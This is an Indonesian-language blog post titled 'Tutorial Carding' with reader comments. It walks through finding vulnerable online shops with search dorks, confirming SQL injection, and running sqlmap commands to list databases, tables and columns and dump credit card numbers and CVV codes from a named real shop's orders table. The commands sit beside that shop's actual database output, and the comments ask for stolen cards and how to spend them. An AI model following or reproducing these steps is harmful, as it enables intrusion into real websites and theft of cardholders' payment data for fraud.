Saturday 30 March 2013

15 Tutorial Carding ( with carding dork & sqlmap )

Posted by Panda Undetected at 21:08
Tutorial Carding ( with carding dork & sqlmap )

Malam ini saya membuat tutorial karena teman saya ada yg minta .
Pertama kita siapkan tools" nya dahulu :

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :





Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,





Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs

Disini kita mendapatkan 3 database :





[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :






Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 





Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+



Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

 contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini
Semoga bermanfaat :)
Home » » Tutorial Carding ( with carding dork & sqlmap )

15 Comments

  1. Copy Paste31 March 2013 at 19:24

    nice tutorial sob

    ReplyDelete
  2. Unknown8 April 2013 at 14:44

    BTW amankan sob. Dan perlu ganti IP ngga

    ReplyDelete
    Replies
    1. Panda Undetected8 April 2013 at 19:38

      aman sob,, ga perlu ganti IP ^_^

      Delete
    2. Unknown12 April 2013 at 13:37

      Gan saya mau tanya kalau beli barang di amazon.com saat sampai akan di tanyakan soal kartu kredit nya tidak ?

      Delete
  3. Panda Undetected8 April 2013 at 19:37

    sibb sib..siap sob ^_^

    ReplyDelete
  4. Unknown9 April 2013 at 15:31

    This comment has been removed by the author.

    ReplyDelete
  5. Unknown13 April 2013 at 11:00

    om,
    add fb ane http://www.facebook.com/david.satriani.125

    ReplyDelete
  6. Bondan Eko Prasetyo4 May 2013 at 04:59

    " BOI<*x2EIKUVU3o> " code hash ini termasuk unix atau apa ya? baru pertama kali liat nih gan ,di tunggu infonya di guelupaemailnya@yahoo.com

    ReplyDelete
  7. Anonymous12 June 2013 at 23:12

    Nyari cc na sih bisa, tapi cara belanja na ini yg saya bingung. Kasih tutor na donk gan.

    ReplyDelete
  8. Anonymous11 July 2013 at 06:57

    dilanjut tut selanjutnya gan... masih banyak web yang cardable dan shipp to indo...

    ReplyDelete
  9. Unknown16 July 2013 at 11:10

    Minta CC Dong gan , Send ammank.scout@gmail.com

    ReplyDelete
  10. Anonymous8 August 2013 at 01:44

    susaah.. cc number ny wktu di dump keluar NULL

    ReplyDelete
  11. richo10 September 2013 at 17:49

    gan masi bisa cara ini???

    ReplyDelete
  12. Unknown1 October 2013 at 20:41

    _ Gan, klo udh dapat CC nya trus di gimanain gan...???

    ReplyDelete

Subscribe to: Post Comments (Atom)

Find Us on Facebook !


 
Copyright © 2012 [ Panda Undetected ]
Design Template Modified By 4rtcode Cyber Team